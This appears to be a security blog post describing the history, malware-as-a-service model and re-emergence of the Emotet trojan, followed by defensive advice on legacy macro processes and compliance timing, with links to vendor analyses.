Identified initially in 2014, Emotet malware has persisted in disrupting many industries. This resilient malware program delivers different malicious payloads to unsuspecting users. It has continued to push our cybersecurity posture, hunting capabilities, and response mechanisms to (hopefully) new limits in all sectors. First introduced as a banking trojan (disguised as something innocuous), Emotet has exhibited rapid growth, agility, and resilience. In fact, Emotet has continually evolved and honed its nefarious capabilities to become a MaaS (Malware-as-a-Service) offering in 2017.

Once a user has activated the program via a malicious link or macro in a downloaded attachment, the Command-and-Control (C2) infrastructure is established, and access to the target is sold to MaaS buyers. The main objectives of the services are to steal valuable information or deploy ransomware for financial gain. Europol led a collaborative effort between law enforcement agencies in the Netherlands, Germany, United States, United Kingdom, France, Lithuania, Canada, and Ukraine dubbed “Operation Ladybird” in 2021 that successfully shut down the Emotet operation for a brief time.

The re-emergence of Emotet was swift, with the adaptation of their email campaigns to include timely and realistic IRS and Covid-19 related content. The threat actors behind Emotet quickly added additional evasion techniques, C2 capabilities, and increased infection mechanisms. Emotet is polymorphic, meaning the code has logic built to evade detection. Payloads delivered by Emotet include IcedID, TrickBot, UmberCrypt, and QakBot. The actors behind Emotet have employed an agile software development lifecycle and adapted to detection mechanisms by increasing the obfuscation capabilities of the program and spreading it through a network. These characteristics make detection difficult.

In many companies, some processes have been established and used for years. These processes can contain End of Life (EoL), vulnerable code, or made with no security precautions in place. Macros in excel/word documents are a prime example of these processes. Often, the individual who established the process is no longer available, and the institutional knowledge has dwindled to accept the process and attempt to safeguard it as is. We often see an unwillingness to upgrade components that could impact the functionality of the process (i.e., Macro), which may result in a complete aversion to updating all software. Workload, timelines, and other pressure can inadvertently foster an environment that favors results over time-consuming security practices or documentation. An emphasis on security-based, approved processes and framework is critical, and subverting the same should not be celebrated for the sake of time saved.

When the proper steps are performed, the speed at which a task can be performed is lessened. Due diligence takes time. Tasks should be measured against the actual time they take to perform while following proper security procedures. If it takes 20 minutes to follow all policies and ensure compliance, then less time indicates a potential issue to investigate. To verify the timeframe for compliant task performance, utilize job rotation. Train another individual via official documentation and document/compare the results. Resources: VMware’s Threat Analysis Team has done a great job breaking down Emotet and exposing the threat further.

Their report can be downloaded here: https://blogs.vmware.com/security/2022/10/emotet-exposed-a-look-inside-the-cybercriminal-supply-chain.html

Microsoft’s Detection and Response Team has published their analysis and findings of Emotet’s enterprise-wide destruction here: https://www.microsoft.com/security/blog/2020/04/02/full-operational-shutdown-another-cybercrime-case-microsoft-detection-and-response-team/